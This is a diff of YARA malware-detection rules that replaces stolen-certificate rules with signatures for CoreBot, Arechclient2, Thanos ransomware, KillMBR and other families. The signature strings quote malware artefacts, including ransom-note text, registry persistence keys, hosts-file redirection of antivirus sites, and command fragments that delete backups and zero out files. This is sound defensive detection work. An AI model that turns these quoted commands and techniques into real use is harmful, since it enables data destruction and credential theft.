+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L419-L430"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4137-L4169"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b7fa450d143de99650d0364e461178ad4e0b147b19dae53b59928b2a17c9b6d"
+		logic_hash = "cc4481ddb6f5fd52a0bc901dde4c34ccf79024cd68605245df0dcbea22d0adee"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8c762918a58ebccb1713720c405088743c0d6d20"
-		importance = 20
+
+	strings:
+		$s1 = ".Speak \"" wide
+		$s2 = "chkUpdateRegistry" fullword wide
+		$s3 = "/C choice /C Y /N /D Y /T 1 & Del \"" fullword wide
+		$s4 = "CreateObject(\"sapi.spvoice\")" fullword wide
+		$s5 = "READ_ME.hta" wide
+		$s6 = "WScript.Sleep(" wide
+		$s7 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		$s8 = "<div class='bold'>Files are encrypted* but not deleted.</div>" ascii
+		$e1 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 2e 00 65 00
+                78 00 65 00 00 09 2e 00 74 00 78 00 74 00 00 09
+                2e 00 64 00 6f 00 63 00 00 0b 2e 00 64 00 6f 00
+                63 00 78 00 00 09 2e 00 78 00 6c 00 73 00 00 0d
+                2e 00 69 00 6e 00 64 00 65 00 78 00 00 09 2e 00
+                70 00 64 00 66 00 00 09 2e 00 7a 00 69 00 70 00
+                00 09 2e 00 72 00 61 00 72 00 00 09 2e 00 63 00
+                73 00 73 00 00 09 2e 00 6c 00 6e 00 6b 00 00 0b
+                2e 00 78 00 6c 00 73 00 78 00 00 09 2e 00 70 00
+                70 00 74 00 00 0b 2e 00 70 00 70 00 74 00 78 00
+                00 09 2e 00 6f 00 64 00 }
+		$e2 = { 68 00 74 00 6d 00 00 07 2e 00 6d 00 6c 00 00 07
+                43 00 3a 00 5c 00 00 07 44 00 3a 00 5c 00 00 07
+                45 00 3a 00 5c 00 00 07 46 00 3a 00 5c 00 00 07
+                47 00 3a 00 5c 00 00 07 5a 00 3a 00 5c 00 00 07
+                41 00 3a 00 5c 00 00 0f 63 00 6d 00 64 00 2e 00
+                65 00 78 00 65 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO MEP" and pe.signatures [ i ] . serial == "06:62:26:cf:6a:4d:8a:e1:10:09:61:a0:c5:40:4f:f9" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $e* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0E96837Dbe5F4548547203919B96Ac27 : FILE
+rule DITEKSHEN_MALWARE_Win_Corebot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects CoreBot"
 		author = "ditekSHen"
-		id = "83258afe-66e0-56d1-8361-125a1142ffe4"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f0351bdb-34ff-5b6d-bc4b-61fc491401ef"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L432-L443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4171-L4226"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2eedcc1d782df3c078c20a275680c2ff724e5b7675890af1335ff22d6138ab25"
+		logic_hash = "518209458fc8912d47b0b99896178fda823c3174c37f21d5e9331349a69322d7"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "d6c6a0a4a57af645c9cad90b57c696ad9ad9fcf9"
-		importance = 20
+		snort_sid = "920211-920212"
+
+	strings:
+		$f1 = "core.cert_fp" fullword ascii
+		$f2 = "core.crash_handler" fullword ascii
+		$f3 = "core.delay" fullword ascii
+		$f4 = "core.guid" fullword ascii
+		$f5 = "core.inject" fullword ascii
+		$f6 = "core.installed_file" fullword ascii
+		$f7 = "core.plugins_dir" fullword ascii
+		$f8 = "core.plugins_key" fullword ascii
+		$f9 = "core.safe_mode" fullword ascii
+		$f10 = "core.server" fullword ascii
+		$f11 = "core.servers" fullword ascii
+		$f12 = "core.test_env" fullword ascii
+		$f13 = "core.vm_detect" fullword ascii
+		$f14 = "core.vm_detect_skip" fullword ascii
+		$s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko" fullword wide
+		$s2 = "\\Microsoft\\Windows\\AppCache" wide
+		$s3 = "crash_flag" fullword wide
+		$s4 = "container.dat" fullword wide
+		$s5 = "INJECTED" fullword ascii
+		$s6 = "tmp.delete_file" fullword ascii
+		$x1 = "CoreBot v" wide
+		$x2 = "BotName" fullword ascii
+		$x3 = "RunBotKiller" fullword ascii
+		$x4 = "botv" fullword ascii
+		$x5 = "\\CoreBot\\CoreBot\\obj\\" ascii
+		$v1_1 = "newtask" fullword wide
+		$v1_2 = "drivers\\etc\\hosts" fullword wide
+		$v1_3 = "/C schtasks /create /tn \\" wide
+		$v1_4 = "/st 00:00 /du 9999:59 /sc once /ri 1 /f" wide
+		$v1_5 = "AntivirusInstalled" fullword ascii
+		$v1_6 = "payload" fullword ascii
+		$v1_7 = "DownloadFile" fullword ascii
+		$v1_8 = "RemoveFile" fullword ascii
+		$v1_9 = "AutoRunName" fullword ascii
+		$v1_10 = "EditHosts" fullword ascii
+		$v1_11 = /127\.0\.0\.1 (avast|mcafee|eset|avira|bitdefender|bullguard|safebrowse)\.com/ fullword wide
+		$cnc1 = "&os=" fullword wide
+		$cnc2 = "&pv=" fullword wide
+		$cnc3 = "&ip=" fullword wide
+		$cnc4 = "&cn=" fullword wide
+		$cnc5 = "&lr=" fullword wide
+		$cnc6 = "&ct=" fullword wide
+		$cnc7 = "&bv=" fullword wide
+		$cnc8 = "&op=" fullword wide
+		$cnc9 = "&td=" fullword wide
+		$cnc10 = "&uni=" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN CORP PTY LTD" and pe.signatures [ i ] . serial == "0e:96:83:7d:be:5f:45:48:54:72:03:91:9b:96:ac:27" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or all of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $f* ) ) or 3 of ( $x* ) or 8 of ( $v1* ) or ( 4 of ( $cnc* ) and 4 of ( $v1* ) ) or 12 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5B320A2F46C99C1Ba1357Bee : FILE
+rule DITEKSHEN_MALWARE_Win_Dllloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects unknown DLL Loader"
 		author = "ditekSHen"
-		id = "376aab03-0bc7-5993-bbbd-9bf5b742d29d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "164967b8-d0f5-543d-82ac-bb2465b85c2a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L445-L456"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4228-L4239"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0a515aa69b5de58cf7d1a496f95038e090cefe511803e7a29332b411a20d19f"
+		logic_hash = "aaf1ff0f93d1fe6cf189c9f30403c226e64146178150dff8dfd3a9e3ed84bcc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5ae8bd51ffa8e82f8f3d8297c4f9caf5e30f425a"
-		importance = 20
+
+	strings:
+		$s1 = "LondLibruryA" fullword ascii
+		$s2 = "LdrLoadDll" fullword ascii
+		$s3 = "snxhk.dll" fullword ascii
+		$s4 = "DisableThreadLibraryCalls" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REGION TOURISM LLC" and pe.signatures [ i ] . serial == "5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_02C5351936Abe405Ac760228A40387E8 : FILE
+rule DITEKSHEN_MALWARE_Win_Farfli : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Farfli backdoor"
 		author = "ditekSHen"
-		id = "32e200c3-678f-5be4-b55b-2a7a32e56843"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4c3c86f4-5493-5e8a-9618-b0c3d55e2b86"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L458-L469"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4241-L4253"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ae9e428c5e7c1ab67be291da93e6d3fa694e3a9b347672817cbf1cac44837a04"
+		logic_hash = "cb1856b32c66d6d070b8ec2d9feea25d6d6748057ceaa342be2ddc589f9a89d6"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "1174c2affb0a364c1b7a231168cfdda5989c04c5"
-		importance = 20
+
+	strings:
+		$s1 = "%ProgramFiles%\\Google\\" fullword ascii
+		$s2 = "%s\\%d.bak" fullword ascii
+		$s3 = "%s Win7" fullword ascii
+		$s4 = "%s:%d:%s" fullword ascii
+		$s5 = "C:\\2.txt" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RESURS-RM OOO" and pe.signatures [ i ] . serial == "02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_08D4352185317271C1Cec9D05C279Af7 : FILE
+rule DITEKSHEN_MALWARE_Win_Warezov : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Warezov worm/downloader"
 		author = "ditekSHen"
-		id = "a0197037-874c-55e7-80aa-e8b7156a26a3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "8cb1dcb1-981d-5ff2-b0d9-aa18dfbfc795"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L471-L482"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4255-L4269"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6f4b8a52e152097a6e18f55b6b677eb1ba0f4da78ce68ffa35510bfb485e01e9"
+		logic_hash = "e65922902fd18175a3ce7b600d46535e92b92240fa3ca83dced6f9ce14f3e815"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "52fe4ecd6c925e89068fee38f1b9a669a70f8bab"
-		importance = 20
+
+	strings:
+		$s1 = "ft\\Windows\\CurrentVersion\\Run" wide
+		$s2 = "DIR%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s3 = "%WINDIR%\\sqhos32.wmf" wide
+		$s4 = "Accept: */*" fullword ascii
+		$s5 = "Range: bytes=" fullword ascii
+		$s6 = "module.exe" fullword ascii
+		$s7 = { 25 73 25 73 2e 25 73 ?? ?? 22 22 26 6c 79 79 56 00 00 00 00 25 73 25 30 34 64 25 30 32 64 25 30 32 64 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Retalit LLC" and pe.signatures [ i ] . serial == "08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ed8Ade5D73B73Dade6943D557Ff87E5 : FILE
+rule DITEKSHEN_MALWARE_Win_Arechclient2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Arechclient2 RAT"
 		author = "ditekSHen"
-		id = "ebdab290-d388-528e-b392-0ae87941b69d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c12858ea-5e06-5303-9df0-0f59ba83b5e5"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L484-L495"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4271-L4303"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e2e269a83a86567bf359996945cddc597406033aa7c5a7acf30b58d30816b28f"
+		logic_hash = "0d841f4d4664fb09801c51f7b65e897e4e698753ad67fc20e2b81d98c0b3d07d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "9bbd8476bf8b62be738437af628d525895a2c9c9"
-		importance = 20
+
+	strings:
+		$s1 = "\\Google\\Chrome\\User Data\\copiedProf\"" wide
+		$s2 = "\",\"BotName\":\"" wide
+		$s3 = "\",\"BotOS\":\"" wide
+		$s4 = "\",\"URLData\":\"" wide
+		$s5 = "{\"Type\":\"ConnectionType\",\"ConnectionType\":\"Client\",\"SessionID\":\"" wide
+		$s6 = "{\"Type\":\"TestURLDump\",\"SessionID\":\"" wide
+		$s7 = "<ReceiveParticipantList>" ascii
+		$s8 = "<potocSkr>" ascii
+		$s9 = "fuck_sd" fullword ascii
+		$s10 = "HandleBotKiller" fullword ascii
+		$s11 = "RunBotKiller" fullword ascii
+		$s12 = "ConnectToServer" fullword ascii
+		$s13 = "KillBrowsers" fullword ascii
+		$s14 = "keybd_event" fullword ascii
+		$s15 = "FuckCodeImg" fullword ascii
+		$v1_1 = "grabber@" fullword ascii
+		$v1_2 = "<BrowserProfile>k__" ascii
+		$v1_3 = "<SystemHardwares>k__" ascii
+		$v1_4 = "<geoplugin_request>k__" ascii
+		$v1_5 = "<ScannedWallets>k__" ascii
+		$v1_6 = "<DicrFiles>k__" ascii
+		$v1_7 = "<MessageClientFiles>k__" ascii
+		$v1_8 = /<Scan(Browsers|Wallets|Screen|VPN)>k__BackingField/ fullword ascii
+		$v1_9 = "displayName[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}Local Extension Settingshost" wide
+		$v1_10 = "\\sitemanager.xml MB or SELECT * FROM Cookiesconfig" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rumikon LLC" and pe.signatures [ i ] . serial == "0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 7 of ( $v1* ) or ( 6 of ( $v1* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ed1847A2Ae5D71Def1E833Fddd33D38 : FILE
+rule DITEKSHEN_MALWARE_Win_Killmbr : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects KillMBR"
 		author = "ditekSHen"
-		id = "5e09087b-3fd0-5979-8f98-f242231c8b4f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b109865f-e268-5633-bb8e-f390dd050d99"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L497-L508"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4305-L4316"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2acc6d2262bac8bfe49bb244d62be4dcf626dd9b2c9786b7a8963c48b17e6ab9"
+		logic_hash = "1ed9206f90052df7e533be4612afa373e5e69fba8f5b5ae4df1c09a9d98958cf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e611a7d4cd6bb8650e1e670567ac99d0bf24b3e8"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\.\\PhysicalDrive" ascii
+		$s2 = "/logger.php" ascii
+		$s3 = "Ooops! Your MBR was been rewritten" ascii
+		$s4 = "No, this ransomware dont encrypt your files, erases it" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SNAB-RESURS, OOO" and pe.signatures [ i ] . serial == "0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" )
+		uint16( 0 ) == 0x5a4d and ( 2 of them and #s1 > 10 )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0292C7D574132Ba5C0441D1C7Ffcb805 : FILE
+rule DITEKSHEN_MALWARE_Win_Lcpdot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects LCPDot"
 		author = "ditekSHen"
-		id = "0792bf83-c0e9-55f8-b6bd-b05bc575e2b4"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e4db3784-7fb0-58bd-997e-788f409445cd"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L510-L521"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4318-L4337"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d0a6714ce5bfed90c80dcfffe4f1d61ec25c817cdc48907cbc67bcee52a1d9a"
+		logic_hash = "b0f77f17976c38a69c2ff0d84002f2db29a4d25873309259519115b5f2b210ff"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d0ae777a34d4f8ce6b06755c007d2d92db2a760c"
-		importance = 20
+
+	strings:
+		$s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide
+		$s2 = "Cookie: SESSID=%s" fullword ascii
+		$s3 = "Cookie=Enable" fullword ascii
+		$s4 = "Cookie=Enable&CookieV=%d&Cookie_Time=32" fullword ascii
+		$s5 = ".?AVTShellCodeRuner@@" fullword ascii
+		$s6 = ".?AVTHashEncDecoder@@" fullword ascii
+		$s7 = ".?AVTWebAddressList@@" fullword ascii
+		$s8 = "WinMain.dll" fullword ascii
+		$s9 = "HotPlugin" wide
+		$o0 = { 4c 89 6c 24 08 4c 89 34 24 44 8d 77 01 44 8d 6f }
+		$o1 = { 8b f0 e8 58 34 00 00 48 8b f8 48 85 c0 74 0c 48 }
+		$o2 = { c7 44 24 30 47 49 46 38 c7 44 24 34 39 61 27 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TES LOGISTIKA d.o.o." and pe.signatures [ i ] . serial == "02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" )
+		uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or ( all of ( $o* ) and 3 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_028D50Ae0C554B49148E82Db5B1C2699 : FILE
+rule DITEKSHEN_MALWARE_Win_Torisma : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Torisma"
 		author = "ditekSHen"
-		id = "35cd05db-c399-5d37-a191-9170b048e263"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e62a0f1c-4404-5da1-9c43-4cb58e735827"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L523-L534"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4339-L4355"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7fe907059e83a058705a2884d514938c51fd206b0a175cfb9e8619244c20c62f"
+		logic_hash = "bd3823f8a91fdfc443e20bcb299a5103b7176a694f0d5328e7986de83f677a31"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0abdbc13639c704ff325035439ea9d20b08bc48e"
-		importance = 20
+
+	strings:
+		$s1 = "ACTION=PREVPAGE&CODE=C%s&RES=%d" fullword ascii
+		$s2 = "ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d" fullword ascii
+		$s3 = "ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%d" fullword ascii
+		$s4 = "Your request has been accepted. ClientID: {" ascii
+		$s5 = "Proxy-Connection: Keep-Alive" fullword wide
+		$s6 = "Content-Length: %d" fullword wide
+		$o0 = { f7 f9 8b c2 89 44 24 34 48 63 44 24 34 48 8b 4c }
+		$o1 = { 48 c7 00 ff ff ff ff 48 8b 84 24 90 }
+		$o2 = { f3 aa 83 7c 24 30 01 75 34 c7 44 24 20 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VAS CO PTY LTD" and pe.signatures [ i ] . serial == "02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" )
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $o* ) and 3 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ca41D2D9F5E991F49B162D584B0F386 : FILE
+rule DITEKSHEN_MALWARE_Win_Thanos : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Thanos / Prometheus / Spook ransomware"
 		author = "ditekSHen"
-		id = "bd395177-daf6-56b1-822c-e659083e0f53"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f523906e-ef5e-57be-82ed-06e75c393f42"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L536-L547"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4357-L4389"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "51f80dfd63b273e62abaa8b60a00525cfdc6b28341466a9f414703382ad088bd"
+		logic_hash = "8ce7cdfe4bca31e21d6fa31a75c46737a41fae3b5b0fda818e3a4709ceaf9bf5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "23250aa8e1b8ae49a64d09644db3a9a65f866957"
-		importance = 20
+
+	strings:
+		$f1 = "<WorkerCrypter2>b__" ascii
+		$f2 = "<Encrypt2>b__" ascii
+		$f3 = "<Killproc>b__" ascii
+		$f4 = "<GetIPInfo>b__" ascii
+		$f5 = "<MacAddress>k__" ascii
+		$f6 = "<IPAddress>k__" ascii
+		$f7 = "<Crypt>b__" ascii
+		$s1 = "Aditional KeyId:" wide
+		$s2 = "process call create cmd.exe /c \\\\" wide
+		$s3 = "/c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin" wide
+		$s4 = "\\HOW_TO_DECYPHER_FILES." wide
+		$s5 = "Client Unique Identifier Key:" wide
+		$s6 = "/s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk" fullword wide
+		$s7 = "NtOpenProcess" fullword wide
+		$s8 = "Builder_Log" fullword wide
+		$s9 = "> Nul & fsutil file setZeroData offset=0 length=" wide
+		$s10 = "3747bdbf-0ef0-42d8-9234-70d68801f407" wide
+		$s11 = "4b195894-0f06-4fdd-afb4-b17fb9246a59" wide
+		$s12 = "cec564ff-2433-4771-b918-15f58ef6e26c" wide
+		$s13 = "56258a19-7489-468b-86ee-e7899203d67c" wide
+		$s14 = "WalkDirectoryTree" fullword ascii
+		$s15 = "hashtableLock" fullword ascii
+		$s16 = "get_ParentFrn" fullword ascii
+		$m1 = "SW5mb3JtYXRpb24uLi" wide
+		$m2 = "QWxsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VB CORPORATE PTY. LTD." and pe.signatures [ i ] . serial == "0c:a4:1d:2d:9f:5e:99:1f:49:b1:62:d5:84:b0:f3:86" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or 5 of ( $s* ) or ( 4 of ( $f* ) and 2 of ( $s* ) or ( all of ( $m* ) and 3 of them ) ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1389C8373C00B792207Bca20Aa40Aa40 : FILE
+rule DITEKSHEN_MALWARE_Win_Tmanager : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects TManager RAT. Associated with TA428"
 		author = "ditekSHen"
-		id = "7f22411b-6e66-5177-8837-12b82b3b916b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "391b72bd-ddf5-5251-b566-c75c1cc16b74"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L549-L560"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4391-L4410"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c0c9ca9e1179f253f1b2ecd9c8a1a0ed17345eb9830201c7c16050339d7ccbc"
+		logic_hash = "cdbcc00ae67c9161f6db89cfa658c8bc8fb7fab3915ac5ae99bdd34c42ee2abb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "38f65d64ac93f080b229ab83cb72619b0754fa6f"
-		importance = 20
+
+	strings:
+		$s1 = "WSAStartup Error!" fullword wide
+		$s2 = "KB3112342.LOG" fullword wide
+		$s3 = "\\cmd.exe -c" fullword wide
+		$s4 = "sock_hmutex" fullword wide
+		$s5 = "cmd_hmutex" fullword wide
+		$s6 = "powershell" fullword wide
+		$s7 = "%s_%d.bmp" fullword wide
+		$s8 = "!Error!" fullword wide
+		$s9 = "[Execute]" fullword ascii
+		$s10 = "[Snapshot]" fullword ascii
+		$s11 = "GetLanIP error!" fullword ascii
+		$s12 = "chcp & exit" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VITA-DE d.o.o." and pe.signatures [ i ] . serial == "13:89:c8:37:3c:00:b7:92:20:7b:ca:20:aa:40:aa:40" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A596Fd2779E507Aa466D159706Fe4150 : FILE
+rule DITEKSHEN_MALWARE_Win_Sn0Wlogger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Sn0w Logger"
 		author = "ditekSHen"
-		id = "8cf28e2a-d90f-5bf6-b746-7f46e8f6aa2a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
